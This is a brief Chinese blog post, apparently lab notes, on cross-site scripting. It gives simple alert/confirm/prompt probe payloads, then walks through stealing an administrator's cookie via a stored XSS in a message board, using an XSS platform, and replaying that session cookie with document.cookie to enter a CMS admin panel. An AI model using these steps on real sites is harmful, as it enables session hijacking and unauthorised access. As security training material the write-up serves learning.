XSS(0628)

发布时间 2023-06-29 17:20:45作者: W-xzg

xss盲打

# 搜索框中搜索
<script>alert(/xss/)</script>
<script>confirm(/xss/);</script>
<script>confirm('xss');</script>
<script>prompt('xss');</script>

image-20230629162411962.png

固定会话攻击

进入xss平台创建项目

image-20230629162952488.png

image-20230629163148079.png

项目配置完成后打开项目代码

image-20230629163426204.png

image-20230629163426204

将代码插入到可能存在xss漏洞的位置,进行留言,将代码插入到留言板

image-20230629163617652.png

等待管理员查看

image-20230629163659012.png

回到xss平台查看cookie信息

image-20230629163931492.png

将获取到的cookie写入浏览器

cookie : 
username=admin; 
userid=1; 
PHPSESSID=4nlh6i2au2qpufav4qh5triel0

将得到的cookie输入到浏览器中,即可进入后台

document.cookie="username=admin";
document.cookie="userid=1";
document.cookie="PHPSESSID=4nlh6i2au2qpufav4qh5triel0";

image-20230629165116834.png

然后直接访问10.4.7.130/cms/admin/

image-20230629165136070.png

进入成功